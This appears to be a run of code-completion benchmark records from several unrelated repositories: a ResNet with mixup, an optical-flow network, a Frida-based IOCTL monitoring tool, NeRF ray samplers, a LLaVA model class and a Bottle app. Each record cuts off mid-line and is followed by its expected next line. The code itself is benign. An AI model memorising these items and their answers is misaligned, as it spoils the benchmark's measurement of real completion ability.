lam = max(lam, 1 - lam)
lam = max(lam, minimum_lambda)
lam = torch.from_numpy(np.array([lam]).astype('float32')).cuda()
lam = Variable(lam)
if target is not None:
target_reweighted = to_one_hot(target, self.num_classes)
if layer_mix == 0:
|
def load_state_dict_from_url(url, model_dir=None, map_location=None, progress=True):
r"""Loads the Torch serialized object at the given URL.
If the object is already present in `model_dir`, it's deserialized and
returned. The filename part of the URL should follow the naming convention
``filename-<sha256>.ext`` where ``<sha256>`` is the first eight or more
digits of the SHA256 hash of the contents of the file. The hash is used to
ensure unique names and to verify the contents of the file.
The default value of `model_dir` is ``$TORCH_HOME/checkpoints`` where
environment variable ``$TORCH_HOME`` defaults to ``$XDG_CACHE_HOME/torch``.
``$XDG_CACHE_HOME`` follows the X Design Group specification of the Linux
filesytem layout, with a default value ``~/.cache`` if not set.
Args:
url (string): URL of the object to download
model_dir (string, optional): directory in which to save the object
map_location (optional): a function or a dict specifying how to remap storage locations (see torch.load)
progress (bool, optional): whether or not to display a progress bar to stderr
Example:
>>> state_dict = torch.hub.load_state_dict_from_url('https://s3.amazonaws.com/pytorch/models/resnet18-5c106cde.pth')
"""
# Issue warning to move data if old env is set
if os.getenv('TORCH_MODEL_ZOO'):
warnings.warn('TORCH_MODEL_ZOO is deprecated, please use env TORCH_HOME instead')
if model_dir is None:
torch_home = _get_torch_home()
model_dir = os.path.join(torch_home, 'checkpoints')
try:
os.makedirs(model_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# Directory already exists, ignore.
pass
else:
# Unexpected OSError, re-raise.
raise
parts = urlparse(url)
filename = os.path.basename(parts.path)
cached_file = os.path.join(model_dir, filename)
if not os.path.exists(cached_file):
sys.stderr.write('Downloading: "{}" to {}\n'.format(url, cached_file))
hash_prefix = HASH_REGEX.search(filename).group(1)
_download_url_to_file(url, cached_file, hash_prefix, progress=progress)
return torch.load(cached_file, map_location=map_location)
def _download_url_to_file(url, dst, hash_prefix, progress):
file_size = None
u = urlopen(url)
meta = u.info()
if hasattr(meta, 'getheaders'):
content_length = meta.getheaders("Content-Length")
else:
content_length = meta.get_all("Content-Length")
if content_length is not None and len(content_length) > 0:
file_size = int(content_length[0])
# We deliberately save it in a temp file and move it after
# download is complete. This prevents a local working checkpoint
# being overriden by a broken download.
dst_dir = os.path.dirname(dst)
f = tempfile.NamedTemporaryFile(delete=False, dir=dst_dir)
try:
if hash_prefix is not None:
sha256 = hashlib.sha256()
with tqdm(total=file_size, disable=not progress,
unit='B', unit_scale=True, unit_divisor=1024) as pbar:
while True:
buffer = u.read(8192)
if len(buffer) == 0:
break
f.write(buffer)
if hash_prefix is not None:
sha256.update(buffer)
pbar.update(len(buffer))
f.close()
if hash_prefix is not None:
digest = sha256.hexdigest()
if digest[:len(hash_prefix)] != hash_prefix:
raise RuntimeError('invalid hash value (expected "{}", got "{}")'
.format(hash_prefix, digest))
shutil.move(f.name, dst)
finally:
f.close()
if os.path.exists(f.name):
os.remove(f.name)
ENV_TORCH_HOME = 'TORCH_HOME'
ENV_XDG_CACHE_HOME = 'XDG_CACHE_HOME'
DEFAULT_CACHE_DIR = '~/.cache'
HASH_REGEX = re.compile(r'-([a-f0-9]*)\.')
def _get_torch_home():
torch_home = os.path.expanduser(
os.getenv(ENV_TORCH_HOME,
os.path.join(os.getenv(ENV_XDG_CACHE_HOME, DEFAULT_CACHE_DIR), 'torch')))
return torch_home
__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',
'resnet152', 'resnext50_32x4d', 'resnext101_32x8d',
'wide_resnet50_2', 'wide_resnet101_2']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
}
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None, avg_downsample=False):
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
self.avg_downsample = avg_downsample
self.avgpool = nn.AvgPool2d(2, stride=2, ceil_mode=True)
self.pad = (0, 0, 0, 0, (planes - inplanes) // 2, (planes - inplanes) // 2)
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
if self.avg_downsample:
x = self.avgpool(x)
identity = nn.functional.pad(x, self.pad)
else:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
# Both self.conv2 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None, avg_downsample=False):
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.num_classes = num_classes
self.dilation = 1
self.avg_downsample = avg_downsample
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
if avg_downsample:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=1, padding=3, bias=False)
else:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
# self.fc = nn.Linear(512 * block.expansion, num_classes,bias=False)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer, self.avg_downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def forward(self, x, target=None, mix_type="vanilla", mixup_alpha=None, num_base_classes=-1,
use_hard_positive_aug=False, add_noise_level=0., mult_noise_level=0., minimum_lambda=0.5,
hpa_type="none", label_sharpening=True, label_mix="vanilla", label_mix_threshold=0.2,
exp_coef=1., cutmix_prob=1., num_similar_class=3, classifiers=None,
gaussian_h1=0.2, piecewise_linear_h1=0.5, piecewise_linear_h2=0., use_softlabel=True):
if "mixup_hidden" in mix_type:
layer_mix = random.randint(0, 3)
else:
layer_mix = None
out = x
if mixup_alpha is not None:
lam = get_lambda(mixup_alpha)
# https://github.com/YU1ut/MixMatch-pytorch/blob/master/train.py#L243
if use_hard_positive_aug:
lam = max(lam, 1 - lam)
lam = max(lam, minimum_lambda)
lam = torch.from_numpy(np.array([lam]).astype('float32')).cuda()
lam = Variable(lam)
if target is not None:
target_reweighted = to_one_hot(target, self.num_classes)
if layer_mix == 0: | out, target_reweighted, mix_label_mask = middle_mixup_process(out, target_reweighted, num_base_classes, | 1 | 2023-10-25 16:50:51+00:00 | 4k |
megvii-research/WACV2024-SAFA | model/flownet.py | [
{
"identifier": "warp",
"path": "model/warplayer.py",
"snippet": "def warp(tenInput, tenFlow, mode='bilinear'):\n k = (str(tenFlow.device), str(tenFlow.size()))\n if k not in backwarp_tenGrid:\n tenHorizontal = torch.linspace(-1.0, 1.0, tenFlow.shape[3]).view(1, 1, 1, tenFlow.shape[3]).expa... | import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
from model.warplayer import warp
from model.head import Head | 1,723 |
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1, groups=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=True, groups=groups),
nn.PReLU(out_planes)
)
def conv_bn(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(out_planes),
nn.PReLU(out_planes)
)
class Resblock(nn.Module):
def __init__(self, c, dilation=1):
super(Resblock, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
nn.PReLU(c),
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
)
self.beta = nn.Parameter(torch.zeros((1, c, 1, 1)), requires_grad=True)
self.prelu = nn.PReLU(c)
def forward(self, x):
y = self.conv(x)
return self.prelu(y * self.beta + x)
class RoundSTE(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = torch.bernoulli(x)
return y
@staticmethod
def backward(ctx, grad):
return grad, None
class RecurrentBlock(nn.Module):
def __init__(self, c, dilation=1, depth=6):
super(RecurrentBlock, self).__init__()
self.conv_stem = conv(3*c+6+1, c, 3, 1, 1, groups=1)
self.conv_backbone = torch.nn.ModuleList([])
self.depth = depth
for i in range(depth):
self.conv_backbone.append(Resblock(c, dilation))
def forward(self, x, i0, i1, flow, timestep, convflow, getscale):
flow_down = F.interpolate(flow, scale_factor=0.5, mode="bilinear")
i0 = warp(i0, flow_down[:, :2] * 0.5)
i1 = warp(i1, flow_down[:, 2:4] * 0.5)
x = torch.cat((x, flow_down, i0, i1, timestep), 1)
scale = RoundSTE.apply(getscale(x)).unsqueeze(2).unsqueeze(3)
feat = 0
if scale.shape[0] != 1 or (scale[:, 0:1].mean() >= 0.5 and scale[:, 1:2].mean() >= 0.5):
x0 = self.conv_stem(x)
for i in range(self.depth):
x0 = self.conv_backbone[i](x0)
feat = feat + x0 * scale[:, 0:1] * scale[:, 1:2]
if scale.shape[0] != 1 or (scale[:, 0:1].mean() < 0.5 and scale[:, 1:2].mean() >= 0.5):
x1 = self.conv_stem(F.interpolate(x, scale_factor=0.5, mode="bilinear"))
for i in range(self.depth):
x1 = self.conv_backbone[i](x1)
feat = feat + F.interpolate(x1, scale_factor=2.0, mode="bilinear") * (1 - scale[:, 0:1]) * scale[:, 1:2]
if scale.shape[0] != 1 or scale[:, 1:2].mean() < 0.5:
x2 = self.conv_stem(F.interpolate(x, scale_factor=0.25, mode="bilinear"))
for i in range(self.depth):
x2 = self.conv_backbone[i](x2)
feat = feat + F.interpolate(x2, scale_factor=4.0, mode="bilinear") * (1 - scale[:, 1:2])
return feat, convflow(feat) + flow, i0, i1, scale
class Flownet(nn.Module):
def __init__(self, block_num, c=64):
super(Flownet, self).__init__()
|
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1, groups=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=True, groups=groups),
nn.PReLU(out_planes)
)
def conv_bn(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1):
return nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(out_planes),
nn.PReLU(out_planes)
)
class Resblock(nn.Module):
def __init__(self, c, dilation=1):
super(Resblock, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
nn.PReLU(c),
nn.Conv2d(c, c, 3, 1, dilation, dilation=dilation, groups=1),
)
self.beta = nn.Parameter(torch.zeros((1, c, 1, 1)), requires_grad=True)
self.prelu = nn.PReLU(c)
def forward(self, x):
y = self.conv(x)
return self.prelu(y * self.beta + x)
class RoundSTE(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = torch.bernoulli(x)
return y
@staticmethod
def backward(ctx, grad):
return grad, None
class RecurrentBlock(nn.Module):
def __init__(self, c, dilation=1, depth=6):
super(RecurrentBlock, self).__init__()
self.conv_stem = conv(3*c+6+1, c, 3, 1, 1, groups=1)
self.conv_backbone = torch.nn.ModuleList([])
self.depth = depth
for i in range(depth):
self.conv_backbone.append(Resblock(c, dilation))
def forward(self, x, i0, i1, flow, timestep, convflow, getscale):
flow_down = F.interpolate(flow, scale_factor=0.5, mode="bilinear")
i0 = warp(i0, flow_down[:, :2] * 0.5)
i1 = warp(i1, flow_down[:, 2:4] * 0.5)
x = torch.cat((x, flow_down, i0, i1, timestep), 1)
scale = RoundSTE.apply(getscale(x)).unsqueeze(2).unsqueeze(3)
feat = 0
if scale.shape[0] != 1 or (scale[:, 0:1].mean() >= 0.5 and scale[:, 1:2].mean() >= 0.5):
x0 = self.conv_stem(x)
for i in range(self.depth):
x0 = self.conv_backbone[i](x0)
feat = feat + x0 * scale[:, 0:1] * scale[:, 1:2]
if scale.shape[0] != 1 or (scale[:, 0:1].mean() < 0.5 and scale[:, 1:2].mean() >= 0.5):
x1 = self.conv_stem(F.interpolate(x, scale_factor=0.5, mode="bilinear"))
for i in range(self.depth):
x1 = self.conv_backbone[i](x1)
feat = feat + F.interpolate(x1, scale_factor=2.0, mode="bilinear") * (1 - scale[:, 0:1]) * scale[:, 1:2]
if scale.shape[0] != 1 or scale[:, 1:2].mean() < 0.5:
x2 = self.conv_stem(F.interpolate(x, scale_factor=0.25, mode="bilinear"))
for i in range(self.depth):
x2 = self.conv_backbone[i](x2)
feat = feat + F.interpolate(x2, scale_factor=4.0, mode="bilinear") * (1 - scale[:, 1:2])
return feat, convflow(feat) + flow, i0, i1, scale
class Flownet(nn.Module):
def __init__(self, block_num, c=64):
super(Flownet, self).__init__() | self.convimg = Head(c) | 1 | 2023-10-26 09:24:29+00:00 | 4k |
Z4kSec/IoctlHunter | ioctl_hunter/lib/hooking.py | [
{
"identifier": "State",
"path": "ioctl_hunter/lib/state.py",
"snippet": "class State:\n results = Results()\n\n script = None\n cur_proc = None\n\n quiet = False\n running = True\n hook_enabled = False\n debug_enabled = False\n hex_out_enabled = False\n\n included_drivers = [... | import ast
import time
import frida
import psutil
import logging
import datetime
from urllib.parse import unquote
from .state import State
from ..utils.misc import (
get_ioctl_code_details,
get_hex_from_hexdump,
get_frida_script_content,
)
from ..ui.display import print_ioctl, print_loaded_driver, print_final_recap | 1,785 |
logger = logging.getLogger("ioctl-hunter")
def check_drivers_filters(ioctl_dict):
if State.results.included_drivers:
for driver in State.results.included_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
return False
ret = False
if State.results.excluded_drivers:
for driver in State.results.excluded_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
ret = True
break
return ret
def check_ioctls_filters(ioctl_dict):
if (
State.results.included_ioctls
and ioctl_dict["ioctl"] in State.results.included_ioctls
):
return False
if (
State.results.excluded_ioctls
and ioctl_dict["ioctl"] in State.results.excluded_ioctls
):
return True
return False
def process_device_ioctl_queue():
ioctls_queue = State.script.exports.getQueueDeviceIoctl()
open_handles = State.script.exports.getOpenHandles()
for ioctl_elem in ioctls_queue:
ioctl_dict = ioctl_elem
try:
ioctl_dict = ast.literal_eval(ioctl_elem)
except:
try:
ioctl_dict = ast.literal_eval(
ioctl_elem.replace("\\", "\\\\").replace("\n", "\\n")
)
except Exception as e:
logger.error(str(e))
logger.error(ioctl_elem)
continue
ioctl_dict["timestamp"] = str(datetime.datetime.now())
ioctl_dict["handle_device"] = {
"dec": ioctl_dict["handle_device"],
"hex": "{0:#010x}".format(int(ioctl_dict["handle_device"])),
}
if ioctl_dict["handle_path"]:
pass
elif open_handles.get(ioctl_dict["handle_device"]["dec"], None):
ioctl_dict["handle_path"] = open_handles.get(
ioctl_dict["handle_device"]["dec"]
)
else:
logger.error(open_handles)
ioctl_dict["handle_path"] = "N/A"
if check_drivers_filters(ioctl_dict):
continue
if check_ioctls_filters(ioctl_dict):
continue
device, access, function, method = get_ioctl_code_details(ioctl_dict["ioctl"])
ioctl_dict["ioctl"] = {
"dec": ioctl_dict["ioctl"],
"hex": "{0:#010x}".format(int(ioctl_dict["ioctl"])),
"details": {
"device": device,
"access": access,
"function": function,
"method": method,
},
}
ioctl_dict["buff_in"]["hexdump"] = unquote(ioctl_dict["buff_in"]["hexdump"])
ioctl_dict["buff_in"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_in"]["hexdump"]
)
ioctl_dict["buff_out"]["hexdump"] = unquote(ioctl_dict["buff_out"]["hexdump"])
ioctl_dict["buff_out"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_out"]["hexdump"]
)
print_ioctl(ioctl_dict)
State.results.add_ioctl(ioctl_dict)
return True
def process_loaded_drivers_queue():
loaded_drivers_queue = State.script.exports.getQueueLoadedDrivers()
if loaded_drivers_queue:
for loaded_driver in loaded_drivers_queue:
loaded_driver["timestamp"] = str(datetime.datetime.now())
State.results.add_loaded_driver(loaded_driver)
|
logger = logging.getLogger("ioctl-hunter")
def check_drivers_filters(ioctl_dict):
if State.results.included_drivers:
for driver in State.results.included_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
return False
ret = False
if State.results.excluded_drivers:
for driver in State.results.excluded_drivers:
if (
ioctl_dict["handle_path"] != "N/A"
and driver.lower() in ioctl_dict["handle_path"].lower()
):
ret = True
break
return ret
def check_ioctls_filters(ioctl_dict):
if (
State.results.included_ioctls
and ioctl_dict["ioctl"] in State.results.included_ioctls
):
return False
if (
State.results.excluded_ioctls
and ioctl_dict["ioctl"] in State.results.excluded_ioctls
):
return True
return False
def process_device_ioctl_queue():
ioctls_queue = State.script.exports.getQueueDeviceIoctl()
open_handles = State.script.exports.getOpenHandles()
for ioctl_elem in ioctls_queue:
ioctl_dict = ioctl_elem
try:
ioctl_dict = ast.literal_eval(ioctl_elem)
except:
try:
ioctl_dict = ast.literal_eval(
ioctl_elem.replace("\\", "\\\\").replace("\n", "\\n")
)
except Exception as e:
logger.error(str(e))
logger.error(ioctl_elem)
continue
ioctl_dict["timestamp"] = str(datetime.datetime.now())
ioctl_dict["handle_device"] = {
"dec": ioctl_dict["handle_device"],
"hex": "{0:#010x}".format(int(ioctl_dict["handle_device"])),
}
if ioctl_dict["handle_path"]:
pass
elif open_handles.get(ioctl_dict["handle_device"]["dec"], None):
ioctl_dict["handle_path"] = open_handles.get(
ioctl_dict["handle_device"]["dec"]
)
else:
logger.error(open_handles)
ioctl_dict["handle_path"] = "N/A"
if check_drivers_filters(ioctl_dict):
continue
if check_ioctls_filters(ioctl_dict):
continue
device, access, function, method = get_ioctl_code_details(ioctl_dict["ioctl"])
ioctl_dict["ioctl"] = {
"dec": ioctl_dict["ioctl"],
"hex": "{0:#010x}".format(int(ioctl_dict["ioctl"])),
"details": {
"device": device,
"access": access,
"function": function,
"method": method,
},
}
ioctl_dict["buff_in"]["hexdump"] = unquote(ioctl_dict["buff_in"]["hexdump"])
ioctl_dict["buff_in"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_in"]["hexdump"]
)
ioctl_dict["buff_out"]["hexdump"] = unquote(ioctl_dict["buff_out"]["hexdump"])
ioctl_dict["buff_out"]["hex"] = get_hex_from_hexdump(
ioctl_dict["buff_out"]["hexdump"]
)
print_ioctl(ioctl_dict)
State.results.add_ioctl(ioctl_dict)
return True
def process_loaded_drivers_queue():
loaded_drivers_queue = State.script.exports.getQueueLoadedDrivers()
if loaded_drivers_queue:
for loaded_driver in loaded_drivers_queue:
loaded_driver["timestamp"] = str(datetime.datetime.now())
State.results.add_loaded_driver(loaded_driver) | print_loaded_driver(loaded_driver) | 5 | 2023-10-31 22:38:36+00:00 | 4k |
7Wate/EndOfYear | main.py | [
{
"identifier": "const",
"path": "src/const.py",
"snippet": "SITE_NAME = \"EndOfYear\"\nSITE_SERVICE_WEB = 1\nSITE_SERVICE_STATIC = 0\nTIME_ZONE = \"Asia/Shanghai\"\nFORMAT_TIME = \"%Y-%m-%d %H:%M:%S\"\nBLOG_POST_CATEGORY_LIFE = 1\nBLOG_POST_CATEGORY_TECH = 2\nBLOG_MAX_KEYS = 7\nLUNAR_HOLIDAYS = {\n ... | from flask import Flask, render_template, redirect, url_for
from loguru import logger
from src import const
from src import models
from src import tools
from src.config import Config
from src.generator import Generator | 2,249 |
app = Flask(__name__)
logger.add("endofyear.log")
@app.route('/')
def home():
# 重定向 painting
return redirect(url_for('painting'))
@app.route('/painting')
def painting():
# 读取配置文件
config = Config("config.ini")
# 站点数据
|
app = Flask(__name__)
logger.add("endofyear.log")
@app.route('/')
def home():
# 重定向 painting
return redirect(url_for('painting'))
@app.route('/painting')
def painting():
# 读取配置文件
config = Config("config.ini")
# 站点数据 | site = models.Site( | 1 | 2023-10-30 03:07:17+00:00 | 4k |
masked-spacetime-hashing/msth | nerfstudio/model_components/ray_samplers.py | [
{
"identifier": "Frustums",
"path": "nerfstudio/cameras/rays.py",
"snippet": "class Frustums(TensorDataclass):\n \"\"\"Describes region of space as a frustum.\"\"\"\n\n origins: TensorType[\"bs\":..., 3]\n \"\"\"xyz coordinate for ray origin.\"\"\"\n directions: TensorType[\"bs\":..., 3]\n ... | from abc import abstractmethod
from typing import Callable, List, Optional, Tuple
from nerfacc import OccupancyGrid
from torch import nn
from torchtyping import TensorType
from nerfstudio.cameras.rays import Frustums, RayBundle, RaySamples
import nerfacc
import torch | 2,751 | # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Collection of sampling strategies
"""
class Sampler(nn.Module):
"""Generate Samples
Args:
num_samples: number of samples to take
"""
def __init__(
self,
num_samples: Optional[int] = None,
) -> None:
super().__init__()
self.num_samples = num_samples
@abstractmethod
| # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Collection of sampling strategies
"""
class Sampler(nn.Module):
"""Generate Samples
Args:
num_samples: number of samples to take
"""
def __init__(
self,
num_samples: Optional[int] = None,
) -> None:
super().__init__()
self.num_samples = num_samples
@abstractmethod | def generate_ray_samples(self) -> RaySamples: | 2 | 2023-10-26 04:39:15+00:00 | 4k |
sehyunkwon/ICTC | step1/llava/model/language_model/llava_llama.py | [
{
"identifier": "LlavaMetaModel",
"path": "step1/llava/model/llava_arch.py",
"snippet": "class LlavaMetaModel:\n\n def __init__(self, config):\n super(LlavaMetaModel, self).__init__(config)\n\n if hasattr(config, \"mm_vision_tower\"):\n self.vision_tower = build_vision_tower(... | from typing import List, Optional, Tuple, Union
from torch.nn import CrossEntropyLoss
from transformers import AutoConfig, AutoModelForCausalLM, \
LlamaConfig, LlamaModel, LlamaForCausalLM
from transformers.modeling_outputs import CausalLMOutputWithPast
from ..llava_arch import LlavaMetaModel, LlavaMetaForCausalLM
import torch
import torch.nn as nn | 3,209 | # Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaConfig(LlamaConfig):
    """Config for LLaVA models; identical to LlamaConfig apart from the model_type key."""

    # "llava" is the registry key used by HF Auto* classes to pair config and model.
    model_type = "llava"
class LlavaLlamaModel(LlavaMetaModel, LlamaModel):
    """Llama backbone combined with LlavaMetaModel's multimodal initialization (MRO: meta first)."""

    # Lets from_pretrained/AutoModel know which config class belongs to this model.
    config_class = LlavaConfig

    def __init__(self, config: LlamaConfig):
        # Cooperative init: LlavaMetaModel.__init__ runs first, then LlamaModel's.
        super(LlavaLlamaModel, self).__init__(config)
| # Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaConfig(LlamaConfig):
    """Config for LLaVA models; identical to LlamaConfig apart from the model_type key."""

    # "llava" is the registry key used by HF Auto* classes to pair config and model.
    model_type = "llava"
class LlavaLlamaModel(LlavaMetaModel, LlamaModel):
    """Llama backbone combined with LlavaMetaModel's multimodal initialization (MRO: meta first)."""

    # Lets from_pretrained/AutoModel know which config class belongs to this model.
    config_class = LlavaConfig

    def __init__(self, config: LlamaConfig):
        # Cooperative init: LlavaMetaModel.__init__ runs first, then LlamaModel's.
        super(LlavaLlamaModel, self).__init__(config)
| class LlavaLlamaForCausalLM(LlamaForCausalLM, LlavaMetaForCausalLM): | 1 | 2023-10-27 05:00:14+00:00 | 4k |
jgujerry/pythonframeworks | frameworks.py | [
{
"identifier": "route",
"path": "bottle.py",
"snippet": "def route(self, path=None, method='GET', callback=None, name=None,\n apply=None, skip=None, **config):\n \"\"\" A decorator to bind a function to a request URL. Example::\n\n @app.route('/hello/:name')\n def hell... | from bottle import route, run, template, static_file | 1,739 |
@route("/")
def index():
    """Serve the site root by rendering the index.html template."""
    return template("index.html")
@route("/static/<filename:path>")
def static(filename):
|
